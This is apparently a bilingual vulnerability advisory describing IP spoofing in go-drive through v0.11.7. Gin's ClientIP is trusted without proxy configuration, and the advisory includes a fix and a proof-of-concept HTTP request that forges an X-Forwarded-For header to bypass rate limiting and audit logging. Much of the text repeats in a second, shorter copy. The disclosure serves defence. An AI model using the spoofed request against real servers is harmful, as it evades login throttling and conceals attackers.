测试环境 (Test Environment)
使用的最新docker拉取环境(The latest Docker image was used for testing):
docker run -d --name go-drive -p 8089:8089 -v `pwd`/go-drive-data:/app/data devld/go-drive
漏洞分析 (Vulnerability Analysis)
漏洞位于LimiterByIP函数,ctx.ClientIP()处,直接使用ctx.ClientIP()获取IP地址:
https://github.com/devld/go-drive/blob/40f2f782463367d27e7b5dbf4d85b5cdd235f137/server/fail_ban.go#L26C13-L26C21 ,
官方文档指出必须要正确的配置 trusted proxy ,否则会出现IP伪造漏洞 https://pkg.go.dev/github.com/gin-gonic/gin#section-readme
The vulnerability is located in the LimiterByIP function, specifically at the call to ctx.ClientIP(), where the client IP address is obtained directly,According to the official Gin documentation, trusted proxies must be properly configured, otherwise ClientIP() becomes vulnerable to IP spoofing:
建议代码中显式的配置可信代理预防此漏洞,见官方文档 https://gin-gonic.com/en/docs/deployment/
It is recommended to explicitly configure trusted proxies in the code to prevent this issue, as documented here: https://gin-gonic.com/en/docs/deployment/
router := gin.Default()
router.SetTrustedProxies([]string{"192.168.1.1/24"})
POC概念利用证明 Proof of Concept (PoC)
修改HTTP请求,在HTTP头中指定任意的X-Forwarded-For,这里我指定的是8.8.8.8:
By modifying the HTTP request and injecting an arbitrary X-Forwarded-For header, the client IP can be spoofed.
In this example, the IP is set to 8.8.8.8:
POST /auth/init HTTP/1.1
Host: 127.0.0.1:8089
Content-Length: 0
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
X-Forwarded-For: 8.8.8.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
审计IP日志,观察到IP地址成功被欺骗:
Checking the logs confirms that the IP address was successfully spoofed:
危害 (Impact)
这将导致日志IP审计的完全失效,也使得内部控制的速率访问控制完全被绕过,带来安全风险
This issue allows complete bypass of IP-based logging and auditing.It also enables attackers to evade rate‑limiting and other IP‑based access control mechanisms, resulting in significant security risks.
影响版本 (Affected Versions)
<=Release v0.11.7
测试环境 (Test Environment)
使用的最新docker拉取环境(The latest Docker image was used for testing):
漏洞分析 (Vulnerability Analysis)
漏洞位于LimiterByIP函数,ctx.ClientIP()处,直接使用ctx.ClientIP()获取IP地址:
https://github.com/devld/go-drive/blob/40f2f782463367d27e7b5dbf4d85b5cdd235f137/server/fail_ban.go#L26C13-L26C21 ,
官方文档指出必须要正确的配置 trusted proxy ,否则会出现IP伪造漏洞 https://pkg.go.dev/github.com/gin-gonic/gin#section-readme
The vulnerability is located in the LimiterByIP function, specifically at the call to ctx.ClientIP(), where the client IP address is obtained directly,According to the official Gin documentation, trusted proxies must be properly configured, otherwise ClientIP() becomes vulnerable to IP spoofing:
建议代码中显式的配置可信代理预防此漏洞,见官方文档 https://gin-gonic.com/en/docs/deployment/
It is recommended to explicitly configure trusted proxies in the code to prevent this issue, as documented here: https://gin-gonic.com/en/docs/deployment/
POC概念利用证明 Proof of Concept (PoC)
修改HTTP请求,在HTTP头中指定任意的X-Forwarded-For,这里我指定的是8.8.8.8:
By modifying the HTTP request and injecting an arbitrary X-Forwarded-For header, the client IP can be spoofed.
In this example, the IP is set to 8.8.8.8:
审计IP日志,观察到IP地址成功被欺骗:
Checking the logs confirms that the IP address was successfully spoofed:
危害 (Impact)
这将导致日志IP审计的完全失效,也使得内部控制的速率访问控制完全被绕过,带来安全风险
This issue allows complete bypass of IP-based logging and auditing.It also enables attackers to evade rate‑limiting and other IP‑based access control mechanisms, resulting in significant security risks.
影响版本 (Affected Versions)
<=Release v0.11.7